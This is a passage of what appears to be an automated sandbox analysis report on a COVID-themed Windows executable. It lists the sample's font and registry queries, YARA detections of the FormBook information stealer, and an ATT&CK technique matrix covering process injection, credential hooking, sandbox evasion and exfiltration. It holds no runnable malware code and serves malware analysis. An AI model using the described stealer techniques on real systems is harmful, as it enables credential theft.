          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1DLL Side-Loading1Process Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Masquerading1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing23Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)DLL Side-Loading1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
